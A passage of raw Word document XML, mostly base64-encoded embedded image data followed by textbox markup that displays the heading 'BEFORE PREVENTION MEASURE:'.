0/x74ikuf7R0XVpRPJHcSeXpHlx+ZHH5cf&#10;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&#10;MxdeNQZkSPhV8Z4epjLjYGA2jx5BZ6n+T599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ExcJSkQQAAC4TAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnht&#10;bFBLAQItAAoAAAAAAAAAIQA7uJKnhy4BAIcuAQAUAAAAAAAAAAAAAAAAAPoGAABkcnMvbWVkaWEv&#10;aW1hZ2UxLmpwZ1BLAQItABQABgAIAAAAIQBcI2qB3QAAAAUBAAAPAAAAAAAAAAAAAAAAALM1AQBk&#10;cnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAAAAAAAAC9&#10;NgEAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAACuNwEAAAA=&#10;">
                <v:rect id="Rectangle 6839" o:spid="_x0000_s1404" style="position:absolute;width:7361;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filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="73F573AA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>BEFORE</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6840" o:spid="_x0000_s1405" style="position:absolute;left:5531;width:56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EvhxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFHrTTUsJ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BPQS+HEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3D91C599" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6841" o:spid="_x0000_s1406" style="position:absolute;left:5958;width:2264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14:paraId="38628F35" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>PREVENTION MEASURE</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6842" o:spid="_x0000_s1407" style="position:absolute;left:22985;width:54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14:paraId="4150D4EB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6843" o:spid="_x0000_s1408" style="position:absolute;left:23411;width:56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14:paraId="3D98BAF9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
